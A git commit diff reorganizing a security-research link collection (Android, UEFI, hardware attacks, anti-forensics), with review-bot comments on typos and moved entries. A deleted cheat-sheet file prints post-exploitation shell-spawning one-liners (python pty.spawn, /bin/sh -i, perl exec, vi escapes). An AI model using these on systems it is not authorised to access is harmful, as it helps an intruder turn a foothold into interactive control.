
Lot of cleanup/re-arrangement/adding of stuff

pull/4/head
Robert 7 years ago
parent
commit
7e973f822b
55 changed files with 973 additions and 955 deletions
1. +41 -82 Draft/Draft/Anonymity Opsec Privacy -.md
2. +13 -0 Draft/Draft/Anti-Forensics.md
3. +0 -44 Draft/Draft/AppSec.md
4. +70 -73 Draft/Draft/Attacking Defending Android -.md
5. +19 -49 Draft/Draft/BIOS UEFI Attacks Defenses.md
6. +4 -9 Draft/Draft/Basic Security Information.md
7. +0 -42 Draft/Draft/CLI Tricks Spawn Shells.md
8. +16 -17 Draft/Draft/CTFs & Wargames -.md
9. +38 -22 Draft/Draft/Cheat sheets reference pages Checklists -.md
10. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt
11. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
12. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt
13. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
14. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt
15. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
16. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
17. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt
18. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
19. +0 -0 Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
20. +0 -20 Draft/Draft/Common CLI CMD Refs.md
21. +0 -0 Draft/Draft/Con Videos Stuff -.md
22. +24 -23 Draft/Draft/Counter Surveillance.md
23. +65 -9 Draft/Draft/Courses & Training -.md
24. +44 -8 Draft/Draft/Darknets -.md
25. +82 -0 Draft/Draft/Data AnalysisVisualization.md
26. +0 -23 Draft/Draft/Data Visualization.md
27. +154 -95 Draft/Draft/Embedded Device & Hardware Hacking -.md
28. +9 -0 Draft/Draft/Exfiltration.md
29. +6 -1 Draft/Draft/Exploit Development.md
30. +5 -1 Draft/Draft/Forensics Incident Response/add cull.txt
31. +4 -0 Draft/Draft/Fuzzing Bug Hunting.md
32. +3 -0 Draft/Draft/Honeypots -.md
33. +31 -5 Draft/Draft/Lockpicking -.md
34. +20 -0 Draft/Draft/Logging - Combine with NSM.md
35. +5 -0 Draft/Draft/Malware.md
36. +34 -21 Draft/Draft/Programming - Languages Libs Courses References.md
37. +31 -1 Draft/Draft/Reverse Engineering.md
38. +9 -0 Draft/Draft/Rootkits.md
39. +1 -1 Draft/Draft/System Internals Windows and Linux Internals Reference.md
40. +17 -2 Draft/Draft/To Do/add cull -1.txt
41. +176 -81 Draft/Draft/Web & Browsers.md
42. +0 -36 Draft/Draft/Web Applications/Add.txt
43. +0 -79 Draft/Draft/Web Applications/Cull integrate.txt
44. +0 -36 Draft/Draft/Web Applications/Databases.txt
45. +0 -22 Draft/Draft/Web Applications/General Tips Trick.txt
46. +0 -30 Draft/Draft/Web Applications/Securing Web Applications.txt
47. +0 -28 Draft/Draft/Web Applications/Tools/Brute Force Tools.txt
48. +0 -6 Draft/Draft/Web Applications/Tools/JS PHP Decoders Unobfuscators.txt
49. +0 -13 Draft/Draft/Web Applications/Tools/Meta.txt
50. +0 -0 Draft/Draft/Web Applications/Tools/SQL Injection.rtf
51. +0 -21 Draft/Draft/Web Applications/Tools/Scanners.txt
52. +0 -0 Draft/Draft/Web Applications/Tools/Tools.rtf
53. +0 -22 Draft/Draft/Web Applications/Tools/WebShells.txt
54. +0 -0 Draft/Draft/Web Applications/Web Applications.rtf
55. +52 -33 Draft/Draft/Wireless Networks & RF.md

Draft/Draft/Anonymity Opsec Privacy.md → Draft/Draft/Anonymity Opsec Privacy -.md


+13 -0 Draft/Draft/Anti-Forensics.md

@ -1,12 +1,25 @@
##Anti-Forenics
[Hiding Data in Hard-Drive's Service Areas](http://recover.co.il/SA-cover/SA-cover.pdf)
* In this paper we will demonstrate how spinning hard-drives’ serv ice areas 1 can be used to hide data from the operating-system (or any software using the standard OS’s API or the standard ATA commands to access the hard- drive)
[Anti-Forensics and Anti-Anti-Forensics Attacks - Michael Perkins](https://www.youtube.com/watch?v=J4x8Hz6_hq0)
* Everyone's heard the claim: Security through obscurity is no security at all. Challenging this claim is the entire field of steganography itself - the art of hiding things in plain sight. Most people know you can hide a text file inside a photograph, or embed a photograph inside an MP3. But how does this work under the hood? What's new in the stego field? This talk will explore how various techniques employed by older steganographic tools work and will discuss a new technique developed by the speaker which embodies both data hiding and data enciphering properties by encoding data inside NTFS volumes. A new tool will be released during this talk that will allow attendees to both encode and decode data with this new scheme.
* [Slides](http://www.slideshare.net/the_netlocksmith/defcon-20-antiforensics-and-antiantiforensics)
[Beyond The CPU:Defeating Hardware Based RAM Acquisition](https://www.blackhat.com/presentations/bh-dc-07/Rutkowska/Presentation/bh-dc-07-Rutkowska-up.pdf)
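Review bot: the heading on the first line of this hunk is misspelled, `##Anti-Forenics`; it should be `##Anti-Forensics` so it matches the filename and the other section headings. The summary under the service-areas paper also carries a copy-paste artifact, `serv ice areas 1` (a split word plus a footnote marker from the PDF); suggest `service areas`.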


+0 -44 Draft/Draft/AppSec.md

@ -1,44 +0,0 @@
##AppSec
idk
https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet
https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet
Secure Coding Practices
SDLC
Code Review
[Bindead - static binary binary analysis tool](https://bitbucket.org/mihaila/bindead/wiki/Home)
* Bindead is an analyzer for executable machine code. It features a disassembler that translates machine code bits into an assembler like language (RREIL) that in turn is then analyzed by the static analysis component using abstract interpretation.
[Applied Appsec](http://www.thotcon.org/archive/0x2presos/10-AppliedApplicationSecurity.pdf)
[Statically Linked Library Detector](https://github.com/arvinddoraiswamy/slid)
[BitBlaze](http://bitblaze.cs.berkeley.edu/)
* The BitBlaze project aims to design and develop a powerful binary analysis platform and employ the platform in order to (1) analyze and develop novel COTS protection and diagnostic mechanisms and (2) analyze, understand, and develop defenses against malicious code. The BitBlaze project also strives to open new application areas of binary analysis, which provides sound and effective solutions to applications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation.
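Review bot: this deletes AppSec.md outright, and nothing in the changed-file list obviously receives its entries; Reverse Engineering.md (+31 in this commit) would be the natural home for the binary-analysis tools (Bindead, BitBlaze, the statically linked library detector), but the two OWASP cheat-sheet links and the Applied Appsec slides have no visible counterpart anywhere in the diff. Please confirm these were moved rather than dropped and say where in the commit message.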

+70 -73 Draft/Draft/Attacking Defending Android -.md

@ -4,20 +4,35 @@ Attacking Android Devices
TOC
Cull
Intro
Android Internals
Vulnerabilities
Exploits
Device Analysis
Application Analysis
* Dynamic Analysis
* Static Analysis
* Online APK Analyzers
Attack Platforms
Android Malware
Reverse Engineering Android
Interesting Papers
Write-ups
Books
Other
[Hacking Your Way Up The Mobile Stack](http://vimeo.com/51270090)
[Secure Coding Standards - Android](https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=111509535)
[csploit](http://www.csploit.org/docs.html)
* The most complete and advanced IT security professional toolkit on Android.(From their site)
* [Github](https://github.com/cSploit/android/tree/master/cSploit)
###Cull
[elsim - Elements Similarities](https://code.google.com/p/elsim/wiki/Similarity#Diffing_of_applications)
* Similarities/Differences of applications (aka rip-off indicator)
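Review bot: the three links after the TOC (`Hacking Your Way Up The Mobile Stack`, `Secure Coding Standards - Android`, `csploit`) sit between the TOC's last entry `Other` and `###Cull` with no heading of their own, so they render as part of the table of contents; move them under `###Cull` or the section they belong to. The TOC also lists `Write-ups` and `Attack Platforms` while the body uses `###Write-ups and Links` and `###Security Analysis`, and heading depth is mixed (`###Cull` beside `####Vulnerabilities`); make the TOC match the actual `###` headings.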
@ -25,57 +40,36 @@ Intro
[ARE - Virtual Machine for Android Reverse Engineering](https://redmine.honeynet.org/projects/are)
[APK Studio - Android Reverse Engineering](https://apkstudio.codeplex.com/)
* APK Studio is an IDE for decompiling/editing & then recompiling of android application binaries. Unlike initial release being Windows exclusive & also didn't support frameworks, this one is completely re-written using QT for cross-platform support. You can now have multiple frameworks installed & pick a particular one on a per project basis.
[Android Reverse Engineering Defenses](https://bluebox.com/wp-content/uploads/2013/05/AndroidREnDefenses201305.pdf)
[Android Bytecode Obfuscation - Patrick Schulz 2012](http://dexlabs.org/blog/bytecode-obfuscation)
[PatchDroid: Scalable Third-Party Security Patches for Android Devices](http://www.mulliner.org/collin/academic/publications/patchdroid.pdf)
* Android is currently the largest mobile platform with around 750 million devices worldwide. Unfortunately, more than 30% of all devices contain publicly known security vulnera- bilities and, in practice, cannot be updated through normal mechanisms since they are not longer supported by the man- ufacturer and mobile operator. This failure of traditional patch distribution systems has resulted in the creation of a large population of vulnerable mobile devices. In this paper, we present PatchDroid, a system to dis- tribute and apply third-party security patches for Android. Our system is designed for device-independent patch cre- ation, and uses in-memory patching techniques to address vulnerabilities in both native and managed code. We created a fully usable prototype of PatchDroid, including a number of patches for well-known vulnerabilities in Android devices. We evaluated our system on different devices from multiple manufacturers and show that we can effectively patch se- curity vulnerabilities on Android devices without impacting performance or usability. Therefore, PatchDroid represents a realistic path towards dramatically reducing the number of exploitable Android devices in the wild.
####Vulnerabilities
[List of Android Vulnerabilities](http://androidvulnerabilities.org/all)
####Exploits
[List of Android Exploits](https://github.com/droidsec/droidsec.github.io/wiki/Vuln-Exploit-List)
###Books
* Android hackers handbook
###Write-ups and Links
[ Inside the Android Play Service's magic OAuth flow ](http://sbktech.blogspot.com/2014/01/inside-android-play-services-magic.html)
* Owning google accounts on android devices
[APK Studio - Android Reverse Engineering](https://apkstudio.codeplex.com/)
* APK Studio is an IDE for decompiling/editing & then recompiling of android application binaries. Unlike initial release being Windows exclusive & also didn't support frameworks, this one is completely re-written using QT for cross-platform support. You can now have multiple frameworks installed & pick a particular one on a per project basis.
[Security enhancements in android through its versions](www.androidtamer.com)
[Understanding the Android bytecode](https://mariokmk.github.io/programming/2015/03/06/learning-android-bytecode.html)
* Writeup on reversing/understanding Android Bytecode
[Android Reverse Engineering Defenses](https://bluebox.com/wp-content/uploads/2013/05/AndroidREnDefenses201305.pdf)
[ClockLockingBeats](https://github.com/monk-dot/ClockLockingBeats)
* Repo for the DARPA CFT / Clock Locking Beats project. Exploring Android kernel and processor interactions to hide running threads
[PatchDroid: Scalable Third-Party Security Patches for Android Devices](http://www.mulliner.org/collin/academic/publications/patchdroid.pdf)
* Android is currently the largest mobile platform with around 750 million devices worldwide. Unfortunately, more than 30% of all devices contain publicly known security vulnera- bilities and, in practice, cannot be updated through normal mechanisms since they are not longer supported by the man- ufacturer and mobile operator. This failure of traditional patch distribution systems has resulted in the creation of a large population of vulnerable mobile devices. In this paper, we present PatchDroid, a system to dis- tribute and apply third-party security patches for Android. Our system is designed for device-independent patch cre- ation, and uses in-memory patching techniques to address vulnerabilities in both native and managed code. We created a fully usable prototype of PatchDroid, including a number of patches for well-known vulnerabilities in Android devices. We evaluated our system on different devices from multiple manufacturers and show that we can effectively patch se- curity vulnerabilities on Android devices without impacting performance or usability. Therefore, PatchDroid represents a realistic path towards dramatically reducing the number of exploitable Android devices in the wild.
###Android Malware
[Rundown of Android Packers](http://www.fortiguard.com/uploads/general/Area41Public.pdf)
###Android Internals
[Dalvik opcodes](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
[APK File Infection on an Android System](https://www.youtube.com/watch?v=HZI1hCdqKjQ&list=PLCDA5DF85AD6B4ABD)
[Dalvik Bytecode Format docs](http://source.android.com/devices/tech/dalvik/dex-format.html)
[Manifesto](https://github.com/maldroid/manifesto)
* PoC framework for APK obfuscation, used to demonstrate some of the obfuscation examples from http://maldr0id.blogspot.com. It supports plugins (located in processing directory) that can do different obfuscation techniques. Main gist is that you run manifesto on the APK file and it produces an obfuscated APK file.
[Android Hacker Protection Level 0 - DEF CON 22 - Tim Strazzere and Jon Sawyer](https://www.youtube.com/watch?v=vLU92bNeIdI)
* Obfuscator here, packer there - the Android ecosystem is becoming a bit cramped with different protectors for developers to choose. With such limited resources online about attacking these protectors, what is a new reverse engineer to do? Have no fear, after drinking all the cheap wine two Android hackers have attacked all the protectors currently available for everyones enjoyment! Whether you've never reversed Android before or are a hardened veteran there will be something for you, along with all the glorious PoC tools and plugins for your little heart could ever desire.
####Vulnerabilities
[List of Android Vulnerabilities](http://androidvulnerabilities.org/all)
###Security Analysis
####Exploits
[List of Android Exploits](https://github.com/droidsec/droidsec.github.io/wiki/Vuln-Exploit-List)
###Device Analysis
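Review bot: `[Security enhancements in android through its versions](www.androidtamer.com)` has no scheme, so markdown renders it as a relative link to `./www.androidtamer.com`; use `http://www.androidtamer.com`. `###Security Analysis` is immediately followed by `####Exploits` with no content of its own, and the PatchDroid abstract still carries PDF line-break hyphens (`vulnera- bilities`, `dis- tribute`, `cre- ation`, `se- curity`) that should be joined while the entry is being moved.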
@ -275,12 +269,32 @@ Check the Encryption section of the overall guide for more information.
###Android Internals
[Dalvik opcodes](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
###Android Malware
[Dalvik Bytecode Format docs](http://source.android.com/devices/tech/dalvik/dex-format.html)
[Rundown of Android Packers](http://www.fortiguard.com/uploads/general/Area41Public.pdf)
[APK File Infection on an Android System](https://www.youtube.com/watch?v=HZI1hCdqKjQ&list=PLCDA5DF85AD6B4ABD)
[Manifesto](https://github.com/maldroid/manifesto)
* PoC framework for APK obfuscation, used to demonstrate some of the obfuscation examples from http://maldr0id.blogspot.com. It supports plugins (located in processing directory) that can do different obfuscation techniques. Main gist is that you run manifesto on the APK file and it produces an obfuscated APK file.
[Android Hacker Protection Level 0 - DEF CON 22 - Tim Strazzere and Jon Sawyer](https://www.youtube.com/watch?v=vLU92bNeIdI)
* Obfuscator here, packer there - the Android ecosystem is becoming a bit cramped with different protectors for developers to choose. With such limited resources online about attacking these protectors, what is a new reverse engineer to do? Have no fear, after drinking all the cheap wine two Android hackers have attacked all the protectors currently available for everyones enjoyment! Whether you've never reversed Android before or are a hardened veteran there will be something for you, along with all the glorious PoC tools and plugins for your little heart could ever desire.
###Reverse Engineering Android
[Android apk-tool](https://code.google.com/p/android-apktool/)
* It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.
[Reversing and Auditing Android’s Proprietary bits](http://www.slideshare.net/joshjdrake/reversing-and-auditing-androids-proprietary-bits)
[Smali](https://code.google.com/p/smali/)
* smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)
[Dexter](http://dexter.dexlabs.org/accounts/login/?next=/dashboard)
* Dexter is a static android application analysis tool
[APKinpsector](https://github.com/honeynet/apkinspector/)
APKinspector is a powerful GUI tool for analysts to analyze the Android applications.
[Reversing Android Apps Slides](http://www.floyd.ch/download/Android_0sec.pdf)
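Review bot: `[APKinpsector]` is misspelled (the description line and the GitHub path both say `apkinspector`), and that description line is the only tool summary in the hunk that is not a `*` bullet. The Dexter entry also links to a login page (`/accounts/login/?next=/dashboard`) rather than the site; link to `http://dexter.dexlabs.org/` instead.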
@ -370,46 +384,29 @@ The project currently includes two applications: FourGoats, a location-based soc
[Insecure Bank v2](https://github.com/dineshshetty/Android-InsecureBankv2)
* This vulnerable Android application is named "InsecureBankv2" and is made for security enthusiasts and developers to learn the Android insecurities by testing this vulnerable application. Its back-end server component is written in python. The client component i.e. the Android InsecureBank.apk can be downloaded along with the source code.
The list of vulnerabilities that are currently included in this release are:
Insecure Logging mechanism
Vulnerable Activity Components
Content providers injection
Weak Broadcast Receiver permissions
Android Pasteboard vulnerability
Local Encryption issues
Android keyboard cache issues
Insecure Webview implementation
Insecure SDCard storage
Insecure HTTP connections
Weak Authorization mechanism
Parameter Manipulation
Weak Cryptography implementation
Hardcoded secrets
Username Enumeration issue
Developer Backdoors
Weak change password implementation
Weak Local storage issues
https://github.com/dineshshetty/Android-InsecureBankv2
###Reverse Engineering Android
[Android apk-tool](https://code.google.com/p/android-apktool/)
* It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.
[Reversing and Auditing Android’s Proprietary bits](http://www.slideshare.net/joshjdrake/reversing-and-auditing-androids-proprietary-bits)
[Smali](https://code.google.com/p/smali/)
* smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)
###Write-ups
[Dexter](http://dexter.dexlabs.org/accounts/login/?next=/dashboard)
* Dexter is a static android application analysis tool.
[ Inside the Android Play Service's magic OAuth flow ](http://sbktech.blogspot.com/2014/01/inside-android-play-services-magic.html)
* Owning google accounts on android devices
[APKinpsector](https://github.com/honeynet/apkinspector/)
APKinspector is a powerful GUI tool for analysts to analyze the Android applications.
[Security enhancements in android through its versions](www.androidtamer.com)
[Reversing Android Apps Slides](http://www.floyd.ch/download/Android_0sec.pdf)
[Understanding the Android bytecode](https://mariokmk.github.io/programming/2015/03/06/learning-android-bytecode.html)
* Writeup on reversing/understanding Android Bytecode
[ClockLockingBeats](https://github.com/monk-dot/ClockLockingBeats)
* Repo for the DARPA CFT / Clock Locking Beats project. Exploring Android kernel and processor interactions to hide running threads
###Books
* Android Hackers Handbook
* Android System Security Internals
###Other
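Review bot: the InsecureBankv2 vulnerability list (`Insecure Logging mechanism` through `Weak Local storage issues`) is a run of bare lines with no list markers, so it renders as a single paragraph; make each an indented `*` bullet under the description, and drop the bare `https://github.com/dineshshetty/Android-InsecureBankv2` line that duplicates the link already in the entry title. The same `APKinpsector` misspelling and schemeless `www.androidtamer.com` link from earlier in the file recur here, and `Android Hackers Handbook` wants an apostrophe (`Android Hacker's Handbook`).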


+19 -49 Draft/Draft/BIOS UEFI Attacks Defenses.md

@ -14,6 +14,24 @@ Writeups
###Cull
[Understanding AMT, UEFI BIOS and Secure boot relationships](https://communities.intel.com/community/itpeernetwork/vproexpert/blog/2013/08/11/understanding-amt-uefi-bios-and-secure-boot-relationships)
[Debug Agent Based UEFI Debugging](https://software.intel.com/en-us/articles/xdb-agent-based-uefi-debug)
* The Intel® System Debugger now supports non-JTAG based debug of UEFI BIOS, this requires the use of a target-side debug agent and a USB or serial connection to the debug agent. This article takes you through the steps necessary and the the debug methodology used bey the Intel® System Debugger to use this method to supplement the pure JTAG based UEFI debug method it also supports
[Official UEFI Site - Specs](http://www.uefi.org/specsandtesttools)
[UEFI - OSDev Wiki](http://wiki.osdev.org/UEFI)
[Easily create UEFI applications using Visual Studio 2013 ](http://pete.akeo.ie/2015/01/easily-create-uefi-applications-using.html)
[Extensible Firmware Interface (EFI) and Unified EFI (UEFI)](http://www.intel.com/content/www/us/en/architecture-and-technology/unified-extensible-firmware-interface/efi-homepage-general-technology.html)
[Windows UEFI startup – A technical overview](http://news.saferbytes.it/analisi/2013/10/windows-uefi-startup-a-technical-overview/)
* Through this analysis paper we’ll give a look at Windows 8 (and 8.1) UEFI startup mechanisms and we’ll try to understand their relationship with the underlying hardware platform.
http://www.legbacore.com/Research.html
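Review bot: the Intel System Debugger summary reads `the the debug methodology used bey` (doubled word, `by`), and the last line of the hunk is a bare `http://www.legbacore.com/Research.html` with no link text or description, unlike every other entry; give it a title such as `[LegbaCore Research]` and a one-line note on what is there.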
@ -118,8 +136,7 @@ Grab links for his papers
[Implementation and Implications of a Stealth Hard-Drive Backdoor](https://www.ibr.cs.tu-bs.de/users/kurmus/papers/acsac13.pdf)
* Modern workstations and servers implicitly trust hard disks to act as well-behaved block devices. This paper analyzes the catastrophic loss of security that occurs when hard disks are not trustworthy. First, we show that it is possible to compromise the firmware of a commercial o -the-shelf hard drive, by resorting only to public information and reverse engineering. Using such a compromised firmware, we present a stealth rootkit that replaces arbitrary blocks from the disk while they are written, providing a data replacement back- door . The measured performance overhead of the compromised disk drive is less than 1% compared with a normal, non-malicious disk drive. We then demonstrate that a re- mote attacker can even establish a communication channel with a compromised disk to infiltrate commands and to ex-filtrate data. In our example, this channel is established over the Internet to an unmodified web server that relies on the compromised drive for its storage, passing through the original webserver, database server, database storage engine, filesystem driver, and block device driver. Additional experiments, performed in an emulated disk-drive environment, could automatically extract sensitive data such as /etc/shadow (or a secret key le) in less than a minute. This paper claims that the diffculty of implementing such an at- tack is not limited to the area of government cyber-warfare; rather, it is well within the reach of moderately funded criminals, botnet herders and academic researchers.
[Attackin the TPM part 2](https://www.youtube.com/watch?v=h-hohCfo4LA)
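Review bot: `[Attackin the TPM part 2]` is missing the `g`, and the hard-drive backdoor abstract keeps PDF extraction damage that should be cleaned while the entry is touched: `o -the-shelf`, `back- door`, `re- mote`, `ex-filtrate`, `key le` (key file), `diffculty`, `at- tack`.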
@ -127,52 +144,5 @@ Grab links for his papers
###Tools:
[Psychson](https://github.com/adamcaudill/Psychson)
Phison 2251-03 (2303) Custom Firmware & Existing Firmware Patches (BadUSB)
###Defending Against Hardware Attacks
[Anti-Evil Maid](http://theinvisiblethings.blogspot.com/2011/09/anti-evil-maid.html?m=1)
###USB
[USB in a Nutshell](http://www.beyondlogic.org/usbnutshell/usb1.shtml)
* Great explanation of the USB standard in depth
[Psychson](https://github.com/adamcaudill/Psychson)
[USB Device Drivers: A Stepping Stone into your Kernel](https://www.youtube.com/watch?v=HQWFHskIY2)
* [Slides])(www.jodeit.org/research/DeepSec2009_USB_Device_Drivers.pdf)
[Lowering the USB Fuzzing Barrier by Transparent Two-Way Emulation](https://www.usenix.org/system/files/conference/woot14/woot14-vantonder.pdf)
* Abstract: Increased focus on the Universal Serial Bus (USB) attack surface of devices has recently resulted in a number of new vulnerabilities. Much of this advance has been aided by the advent of hardware-based USB emulation techniques. However, existing tools and methods are far from ideal, requiring a significant investment of time, money, and effort. In this work, we present a USB testing framework that improves significantly over existing methods in providing a cost-effective and flexible way to read and modify USB communication. Amongst other benefits, the framework enables man-in-the-middle fuzz testing between a host and peripheral. We achieve this by performing two-way emulation using inexpensive bespoke USB testing hardware, thereby delivering capa-bilities of a USB analyzer at a tenth of the cost. Mutational fuzzing is applied during live communication between a host and peripheral, yielding new security-relevant bugs. Lastly, we comment on the potential of the framework to improve current exploitation techniques on the USB channel.
###SD Cards
[The Exploration and Exploitation of an SD Memory Card](https://www.youtube.com/watch?v=Tj-zI8Tl218)
* This talk demonstrates a method for reverse engineering and loading code into the microcontroller within a SD memory card.
###Computer Hardware Attack Writeups
[Perimeter-Crossing Buses: a New Attack Surface for
Embedded Systems](http://www.cs.dartmouth.edu/~sws/pubs/bgjss12.pdf)
* Abstract: This paper maps out the bus-facing attack surface of a modern operating system, and demonstrates that e ective and ecient injection of trac into the buses is real and easily a ordable. Further, it presents a simple and inexpen-sive hardware tool for the job, outlining the architectural and computation-theoretic challenges to creating a defensive OS/driver architecture comparable to that which has been achieved for network stacks.
[Breaking apple touchID cheaply](http://www.ccc.de/en/updates/2013/ccc-breaks-apple-touchid)
[Keykeriki v2.0](http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html)
* Hardware to attack wireless keyboards and other such things
[Stealthy Dopant-Level Hardware Trojans](Hardware level trojans http://sharps.org/wp-content/uploads/BECKER-CHES.pdf)
* Abstract: In this paper we propose an extremely stealthy approach for implement- ing hardware Trojans below the gate level, and we evaluate their impact on the security of the target device. Instead of adding additional cir- cuitry to the target design, we insert our hardware Trojans by changing the dopant polarity of existing transistors. Since the modi ed circuit ap- pears legitimate on all wiring layers (including all metal and polysilicon), our family of Trojans is resistant to most detection techniques, includ- ing ne-grain optical inspection and checking against \golden chips". We demonstrate the e ectiveness of our approach by inserting Trojans into two designs | a digital post-processing derived from Intel's cryp- tographically secure RNG design used in the Ivy Bridge processors and a side-channel resistant SBox implementation | and by exploring their detectability and their e ects on security.
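Review bot: this hunk removes the USB, SD-card and hardware-attack write-up sections (47 lines) from the BIOS/UEFI page; `Embedded Device & Hardware Hacking -.md` gains +154 lines in the same commit, so presumably they moved there, but please confirm and mention it in the commit message. Two entries are broken as shown and should be fixed wherever they land: `* [Slides])(www.jodeit.org/...)` has a stray `)` and no scheme, and the Stealthy Dopant-Level Hardware Trojans link target is `(Hardware level trojans http://sharps.org/...)`, i.e. prose inside the URL parentheses. The "Perimeter-Crossing Buses" title is also split across two lines, which breaks the markdown link.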

+4 -9 Draft/Draft/Basic Security Information.md

@ -1,21 +1,12 @@
##Basic Security Principles/Information
Shodan Guide
[Shodan Man page](http://www.shodanhq.com/help)
[Shodan Filter Reference](http://www.shodanhq.com/help/filters)
[Shodan FAQ](http://www.shodanhq.com/help/faq)
[Types of Authentication](http://www.gfi.com/blog/security-101-authentication-part-2/)
[Information Security For Journalist book - Centre for Investigative Journalism](http://files.gendo.nl/Books/InfoSec_for_Journalists_V1.1.pdf)
[Access control best practices](https://srlabs.de/acs/)
@ -36,4 +27,8 @@ Shodan Guide
Shodan Guide
[Shodan Man page](http://www.shodanhq.com/help)
[Shodan Filter Reference](http://www.shodanhq.com/help/filters)
[Shodan FAQ](http://www.shodanhq.com/help/faq)
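Review bot: the Shodan block moved to the end of the file keeps `Shodan Guide` as a bare line rather than a heading, while the file opens with `##Basic Security Principles/Information`; suggest `###Shodan Guide` so it is a navigable section like the rest of the page.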

+0 -42 Draft/Draft/CLI Tricks Spawn Shells.md

@ -1,42 +0,0 @@
Using TCP dump to dump traffic to a pcap file for inspection later:
tcpdump -i <interface> -s 65535 -w <some-file>
Spawning Shells
Sometimes when you pop a box, you’re left with something other than a full TTY shell. These commands can help you spawn one.
Shell Spawning
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec (’bin/sh’)
(From within vi)
bash
(From within vi)
:set shell=/bin/bash:shell
(from within nmap)
(From http://netsec.ws/?p=337#more-337 )
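Review bot: this removes the shell-spawning cheatsheet wholesale; the only plausible destination in the changed-file list is `Cheat sheets reference pages Checklists -.md` (+38), so please confirm the content landed there. Several of the removed lines were already wrong and should not be carried over verbatim: `perl —e` uses an em dash instead of `-e`, `exec (’bin/sh’)` has curly quotes and is missing the leading slash (`exec('/bin/sh')`), the `(from within nmap)` label has no command under it, and `(From within vi)` is repeated for both `bash` and the `:set shell=` line.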

Draft/Draft/CTFs & Wargames.md → Draft/Draft/CTFs & Wargames -.md


Draft/Draft/Cheat sheets reference pages Checklists.md → Draft/Draft/Cheat sheets reference pages Checklists -.md


Draft/Draft/Common CLI CMD Refs/Curl.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt


Draft/Draft/Common CLI CMD Refs/Metasploit.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt


Draft/Draft/Common CLI CMD Refs/Ncat.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt


Draft/Draft/Cheat sheets reference pages Checklists/Nmap Cheat Sheet.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt


Draft/Draft/Common CLI CMD Refs/Nmap.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt


Draft/Draft/Cheat sheets reference pages Checklists/SQLMap Cheat Sheet.txt → Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt


Draft/Draft/Common CLI CMD Refs/TCPDump.txt → Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt


Draft/Draft/Common CLI CMD Refs/ToDO.txt → Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt


Draft/Draft/Cheat sheets reference pages Checklists/WebApp Exploitation Cheat Sheet.txt → Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt


Draft/Draft/Cheat sheets reference pages Checklists/sqli cheat.txt → Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt


+0 -20 Draft/Draft/Common CLI CMD Refs.md

@ -1,20 +0,0 @@
###Common CLI Commands Reference
TCPDump
Ncat
Nmap
Metasploit
Curl
Netsh
Wget
httpry
dsniff suite
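Review bot: deleting this index is fine as a move, since its .txt files are renamed into `Cheat sheets reference pages Checklists -/` in the same commit, but `Netsh`, `Wget`, `httpry` and `dsniff suite` had no file behind them and now lose their only mention. Either add stub files for them in the new folder or carry them into `Cheat sheets reference pages Checklists -.md` as still to do.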

Draft/Draft/Con Videos Stuff.md → Draft/Draft/Con Videos Stuff -.md


+24 -23 Draft/Draft/Counter Surveillance.md

@ -5,10 +5,11 @@ I am not a professional and may be a twelve year old child. Be wary.
ToC
Cull
Guides/Write-ups
Papers
Videos
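Review bot: the TOC here lists `Cull`, `Guides/Write-ups`, `Papers`, `Videos`, but the body of this file uses `###Blogs/Sites` for the Spiderlabs series and the TSCM guide, which the TOC does not mention; add it, or fold those links under `Guides/Write-ups`.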
@ -19,43 +20,28 @@ I am not a professional and may be a twelve year old child. Be wary.
###Cull
[Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
